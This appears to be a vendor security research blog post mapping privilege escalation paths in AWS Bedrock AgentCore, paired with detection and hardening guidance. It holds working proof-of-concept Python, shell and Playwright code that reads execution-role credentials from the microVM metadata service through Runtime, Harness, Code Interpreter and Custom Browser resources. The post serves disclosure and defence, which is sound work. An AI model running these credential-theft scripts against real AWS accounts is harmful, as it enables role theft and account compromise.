Mapping Every Privilege Escalation Path in AWS AgentCore

One IAM permission allows an attacker to read any AgentCore execution role's credentials, bypassing the agent, the model, and its guardrails. AgentCore runs each resource inside a Firecracker microVM and serves credentials from MMDS—the microVM metadata service equivalent to EC2's IMDS.

This post maps every privilege escalation path in Amazon Bedrock AgentCore across the Runtime, Harness, Code Interpreter, and Custom Browser environments, providing actionable detection strategies and recommendations.

• One architecture, every entry point. AgentCore Runtime, Harness, Code Interpreter and Browser all run on Firecracker microVMs with the execution role on MMDS at 169.254.169.254. Any code that reaches the microVM can read the role's credentials.

• A single IAM permission reads any AgentCore Runtime or Harness execution role from MMDS. bedrock-agentcore:InvokeAgentRuntimeCommand runs shell commands as root inside the runtime microVM, bypassing the agent, model and guardrails entirely.

• Each path has two vectors: an existing resource or a new one. Targeting an existing resource requires fewer IAM permissions, but the attacker needs its ARN or ID, and is restricted to the pre-deployed role. Creating a new resource needs iam:PassRole plus a Create* chain, but allows the attacker to choose which role to escalate to.
  

How AgentCore Exposes IAM Credentials via MMDS

Amazon Bedrock AgentCore is AWS's platform to build, connect and optimize AI agents. It includes services for memory, identity, gateway, and more. This post focuses on four resource types that share a single credential model.

Each resource accepts an execution role at creation (the IAM role the resource uses to call AWS APIs from inside the microVM) and runs on a Firecracker microVM. AgentCore assumes that role and delivers temporary credentials to the microVM, mirroring how an EC2 instance profile works.

The internal resource reads them from MMDS at 169.254.169.254 (AgentCore's equivalent of EC2's IMDS) to call AWS APIs (Bedrock to invoke foundation models, S3 to read or write data, anything the role allows). Anything else that lands in the microVM reads the same MMDS:

1TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \ 2 -H "X-aws-ec2-metadata-token-ttl-seconds: 60") 3curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/execution_role

AgentCore exposes this credential model through each of these resources:

• Runtime: A serverless environment for deploying and scaling AI agents and tools (via container image or ZIP). InvokeAgentRuntime runs the agent, while InvokeAgentRuntimeCommand executes shell commands.

• Harness: A managed agent loop built on top of Runtime, configured with a model, tools, memory and skills. InvokeHarness sends prompts to the model, while InvokeAgentRuntimeCommand runs shell commands.

• Code Interpreter: An isolated sandbox for executing code (Python, JavaScript or TypeScript) and shell commands. StartCodeInterpreterSession opens a session, InvokeCodeInterpreter runs the submitted code or command.

• Custom Browser: A managed Chromium runtime for AI-driven browser automation. StartBrowserSession opens a session and ConnectBrowserAutomationStream connects a remote driver to the browser.

These represent four entry points that allow an attacker to land code inside the same microVM architecture and read the role's credentials from MMDS.

InvokeAgentRuntimeCommand submits a shell command that runs as root inside the microVM, executing in parallel to the customer’s agent process (running as agentcore-runtime-user). This shell command bypasses the customer's agent entirely, regardless of what framework, code or guardrails the agent uses. The model never sees the request and the customer's safety controls never run.

The same mechanism as Path 1 is run against an existing Harness. Harness is AgentCore Runtime with a managed agent layer on top (model, tools, memory, observability); InvokeAgentRuntimeCommand bypasses that layer and runs as root in the runtime microVM, regardless of which model, tools or guardrails the harness was configured with.

An attacker with existing read permissions can enumerate candidate harness ARNs via bedrock-agentcore:ListHarnesses, CloudTrail management events or the Console, then invoke them to read execution role credentials from MMDS.

Proof of concept

Same as Path 1 with the ARN pointing to the harness:

1import boto3, uuid2command = """bash -c ' 3TOKEN=$(curl -sX PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60") 4curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/execution_role 5'"""6client = boto3.client("bedrock-agentcore", region_name="us-east-1") 7response = client.invoke_agent_runtime_command( 8 agentRuntimeArn="arn:aws:bedrock-agentcore:us-east-1:<VICTIM>:harness/<id>", # harness ARN, not the runtime ARN 9 runtimeSessionId=str(uuid.uuid4()), 10 body={"command": command, "timeout": 30}, 11) 12for event in response["stream"]: 13 chunk = event["chunk"] 14 if "contentDelta" in chunk and "stdout" in chunk["contentDelta"]: 15 print(chunk["contentDelta"]["stdout"])

Code Interpreter runs customer-submitted code inside a Firecracker microVM. The execution role is optional at creation: when attached, any code in the sandbox reads its credentials from MMDS; when omitted, the microVM has no credentials to expose and Code Interpreter is not affected by this path.

An attacker with existing read permissions can enumerate candidate Code Interpreters via bedrock-agentcore:ListCodeInterpreters, CloudTrail management events or the Console. Opening a session and submitting code that reads MMDS from inside the sandbox returns the execution role credentials. This path was also independently documented by Nigel Sood of Sonrai Security.

Proof of concept

1import boto32code = 'TOKEN=$(curl -sX PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60"); curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/execution_role'3client = boto3.client("bedrock-agentcore", region_name="us-east-1")4session = client.start_code_interpreter_session(codeInterpreterIdentifier="<CI-id>", sessionTimeoutSeconds=300)["sessionId"]5response = client.invoke_code_interpreter(6 codeInterpreterIdentifier="<CI-id>",7 sessionId=session,8 name="executeCommand",9 arguments={"command": code},10)11for event in response["stream"]:12 sc = event.get("result", {}).get("structuredContent", {})13 if sc.get("stdout"):14 print(sc["stdout"])

Custom Browser runs a browser session inside a Firecracker microVM. The execution role is optional at creation: when attached, the role credentials are reachable on MMDS from inside the microVM; when omitted, Custom Browser has no credentials to expose and is not affected by this path.

A client connects to the browser's automation endpoint, a presigned WebSocket that speaks Chrome DevTools Protocol (CDP), and controls the browser from outside the microVM. AWS recommends libraries like Strands, Nova Act or Playwright as the client.

An attacker with existing read permissions can enumerate candidate Custom Browsers via bedrock-agentcore:ListBrowsers, CloudTrail management events or the Console.

Reading the execution role credentials takes four steps:

1. Presign the WebSocket URL. The attacker presigns the browser's automation endpoint URL with their AWS credentials. This is what Playwright will connect to.

2. Connect Playwright over CDP. connect_over_cdp(ws_url) opens a Chrome DevTools Protocol session against the remote Chromium running inside the microVM.

3. Install a request hook. A context.route hook intercepts every request the browser sends to 169.254.169.254. It rewrites the GET on /latest/api/token into a PUT (which MMDSv2 requires), and on subsequent requests it injects the X-aws-ec2-metadata-token header so they succeed.

4. Navigate to MMDS. The browser hits the token URL and the role-credentials URL in sequence. Each response renders in the page body, and the script reads it out.

Sending the PUT from inside the page would be blocked: browsers refuse cross-origin PUT requests unless the destination opts in, and MMDS does not. context.route operates one layer below the page, where outbound requests can be rewritten before those rules apply.

Proof of concept

1import boto3 2from botocore.auth import SigV4QueryAuth 3from botocore.awsrequest import AWSRequest 4from playwright.sync_api import sync_playwright 5REGION = "us-east-1" 6BROWSER_ID = "<browser-id>" 7client = boto3.client("bedrock-agentcore", region_name=REGION) 8session_id = client.start_browser_session(browserIdentifier=BROWSER_ID, sessionTimeoutSeconds=300)["sessionId"] 9creds = boto3.Session().get_credentials().get_frozen_credentials() 10url = f"https://bedrock-agentcore.{REGION}.amazonaws.com/browser-streams/{BROWSER_ID}/sessions/{session_id}/automation" 11request = AWSRequest(method="GET", url=url) 12SigV4QueryAuth(creds, "bedrock-agentcore", REGION, expires=60).add_auth(request) 13ws_url = request.url.replace("https://", "wss://") 14with sync_playwright() as p: 15 browser = p.chromium.connect_over_cdp(ws_url) 16 page = browser.contexts[0].pages[0] 17 token = {"value": ""} 18 def rewrite(route): 19 if "/latest/api/token" in route.request.url: 20 route.continue_(method="PUT", headers={"X-aws-ec2-metadata-token-ttl-seconds": "60"}) 21 else: 22 route.continue_(headers={"X-aws-ec2-metadata-token": token["value"]}) 23 page.context.route("http://169.254.169.254/**", rewrite) 24 page.goto("http://169.254.169.254/latest/...") 25 token["value"] = page.locator("pre").text_content().strip() 26 page.goto("http://169.254.169.254/latest/meta-data/iam/security-credentials/execution_role") 27 print(page.locator("pre").text_content())

To detect all the privilege escalation paths covered in this blog, logging that captures both the API calls into AgentCore and what the attacker submits inside them is required.

By default, CloudTrail logs only the resource creation calls (CreateAgentRuntime, CreateHarness, CreateCodeInterpreter, CreateBrowser) and the iam:PassRole they trigger. The actions the attacker actually uses to extract credentials (InvokeAgentRuntimeCommand, StartCodeInterpreterSession, InvokeCodeInterpreter, StartBrowserSession, ConnectBrowserAutomationStream) are invisible until you enable CloudTrail data events.

Four data event types cover every privilege escalation path: AWS::BedrockAgentCore::Runtime and RuntimeEndpoint for Runtime and Harness (Harness manages a Runtime under the hood), CodeInterpreterCustom for Code Interpreter and BrowserCustom for Custom Browser. Apply to a trail with:

1aws cloudtrail put-event-selectors \ 2 --trail-name <your-trail> \ 3 --advanced-event-selectors '[ 4 {"FieldSelectors": [{"Field": "eventCategory", "Equals": ["Data"]}, {"Field": "resources.type", "Equals": ["AWS::BedrockAgentCore::Runtime"]}]}, 5 {"FieldSelectors": [{"Field": "eventCategory", "Equals": ["Data"]}, {"Field": "resources.type", "Equals": ["AWS::BedrockAgentCore::RuntimeEndpoint"]}]}, 6 {"FieldSelectors": [{"Field": "eventCategory", "Equals": ["Data"]}, {"Field": "resources.type", "Equals": ["AWS::BedrockAgentCore::CodeInterpreterCustom"]}]}, 7 {"FieldSelectors": [{"Field": "eventCategory", "Equals": ["Data"]}, {"Field": "resources.type", "Equals": ["AWS::BedrockAgentCore::BrowserCustom"]}]} 8 ]' 

Each data event captures only the API call's metadata like the attacker's identity, the timestamp, the source IP and the target resource ARN. The actual shell command or submitted code by an attacker stays invisible to CloudTrail, as you can see in an InvokeAgentRuntimeCommand event captured by the trail:

1{2 "eventVersion": "1.11",3 "userIdentity": {4 "type": "AssumedRole",5 "principalId": "AROAEXAMPLE1234567A:attacker-session",6 "arn": "arn:aws:sts::123456789012:assumed-role/attacker-agentcore/attacker-session",7 "accountId": "123456789012",8 "accessKeyId": "ASIAEXAMPLE1234567A",9 "sessionContext": {10 "sessionIssuer": {11 "type": "Role",12 "principalId": "AROAEXAMPLE1234567A",13 "arn": "arn:aws:iam::123456789012:role/attacker-agentcore",14 "accountId": "123456789012",15 "userName": "attacker-agentcore"16 },17 "attributes": {18 "creationDate": "2026-05-26T20:22:07Z",19 "mfaAuthenticated": "false"20 }21 }22 },23 "eventTime": "2026-05-26T20:22:12Z",24 "eventSource": "bedrock-agentcore.amazonaws.com",25 "eventName": "InvokeAgentRuntimeCommand",26 "awsRegion": "us-east-1",27 "sourceIPAddress": "REDACTED",28 "userAgent": "Boto3/1.43.0 md/Botocore#1.43.0 ...",29 "requestParameters": null,30 "responseElements": {31 "runtimeSessionId": "REDACTED",32 "traceId": "Self=1-6a1600f3-0fe4c68c1e690647127b68e1;Root=1-6a1600f3-451073887c4404271a1fae82",33 "statusCode": 200,34 "stream": {35 "publisher": {}36 }37 },38 "requestID": "2035961c-7692-4bdf-b573-e769ac803f37",39 "eventID": "171d2c01-dbf8-4225-80ab-75c779a41666",40 "readOnly": false,41 "resources": [42 {43 "accountId": "123456789012",44 "type": "AWS::BedrockAgentCore::Runtime",45 "ARN": "arn:aws:bedrock-agentcore:us-east-1:123456789012:runtime/hosted_agent_prod-XuTKdY2Ohe"46 },47 {48 "accountId": "123456789012",49 "type": "AWS::BedrockAgentCore::RuntimeEndpoint",50 "ARN": "arn:aws:bedrock-agentcore:us-east-1:123456789012:runtime/hosted_agent_prod-XuTKdY2Ohe/runtime-endpoint/DEFAULT"51 }52 ],53 "eventType": "AwsApiCall",54 "managementEvent": false,55 "recipientAccountId": "123456789012",56 "eventCategory": "Data",57 "tlsDetails": {58 "tlsVersion": "TLSv1.3",59 "cipherSuite": "TLS_AES_128_GCM_SHA256",60 "clientProvidedHostHeader": "bedrock-agentcore.us-east-1.amazonaws.com"61 }62} 

By default, a CloudWatch log group /aws/bedrock-agentcore/runtimes/<runtimeId>-DEFAULT is auto-created by AWS when an AgentCore Harness or Runtime is created. It records the body of every InvokeAgentRuntimeCommand submitted to the runtime.

1. Constrain bedrock-agentcore:InvokeAgentRuntimeCommand. This single permission runs arbitrary shell commands as root inside the Runtime or Harness microVM, bypassing the agent, model and guardrails. Anything inside the microVM is then reachable, the execution role on MMDS included. Any policy that grants the bedrock-agentcore:* wildcard includes it, including the AWS managed BedrockAgentCoreFullAccess. AWS recommends not granting it to principals that do not need direct command execution. In AWS Organizations, deny it org-wide with a Service Control Policy except for an approved allowlist.

1{ 2 "Version": "2012-10-17", 3 "Statement": [{ 4 "Sid": "DenyAgentCoreInvokeCommandExceptApproved", 5 "Effect": "Deny", 6 "Action": "bedrock-agentcore:InvokeAgentRuntimeCommand", 7 "Resource": "*", 8 "Condition": { 9 "ArnNotLike": { 10 "aws:PrincipalArn": "arn:aws:iam::*:role/<allowlisted-principals>" 11 } 12 } 13 }] 14} 

2. Audit iam:PassRole on roles AgentCore can assume. All four creation paths need iam:PassRole on a target role whose trust policy accepts the AgentCore service principal. Identify those roles and confirm that the principals holding iam:PassRole on each are the ones you actually want deploying AgentCore. Most accidental privilege escalation paths in practice come from iam:PassRole being broader than the deployment story.

3. Create Code Interpreter and Custom Browser without an execution role when the workload does not need AWS API access from inside the sandbox. Both can be created without a role attached, and the resulting microVM has no credentials to leak. Runtime and Harness require a role at creation, so this only applies to the other two.

4. Reduce the value of a stolen role. The role on MMDS is exactly what the attacker gets, so scoping every AgentCore execution role to least privilege turns role theft into stealing what the role can already do. Start from AWS's documented per-primitive execution role policy and add only what your workload calls: AgentCore Runtime, Harness, Code Interpreter, Custom Browser. Pay particular attention to the default service roles the Console auto-provisions for Runtime and Harness (AmazonBedrockAgentCoreRuntimeDefaultServiceRole-*, AmazonBedrockAgentCoreHarnessDefaultServiceRole-*); customers often extend these with additional workload permissions that then become reachable through InvokeAgentRuntimeCommand.

5. Configure detection coverage. Follow the Detection section to enable CloudTrail data events for the four AgentCore resource types and application log delivery on each Code Interpreter.

AgentCore puts an IAM execution role on MMDS inside a Firecracker microVM, the same primitive EC2 has used for years; the change is that AgentCore exposes four entry points to that microVM, not one. A single IAM permission, bedrock-agentcore:InvokeAgentRuntimeCommand, drops a root shell inside and reads the role credentials. The model, the guardrails and the agent code sit beside the microVM; the privilege escalation walks past all of them.

Two IAM gates control the surface: iam:PassRole to create a new resource, Invoke* or Start* on an existing one. Audit both gates and scope each execution role to least privilege. A successful privilege escalation then steals nothing the role couldn't already do.

Four resources, two IAM gates, one credential primitive.

Phantom Labs™ researchers "think like attackers" to expose privilege escalation paths and identity attack vectors, helping defenders proactively uncover misconfigurations and detect threats in complex hybrid and cloud environments.

• https://www.beyondtrust.com/blog/entry/pwning-aws-agentcore-code-interpreter

• https://www.beyondtrust.com/blog/entry/aws-bedrock-security-api-keys

• https://www.beyondtrust.com/blog/entry/aws-bedrock-security-guide-api-keys-detection-response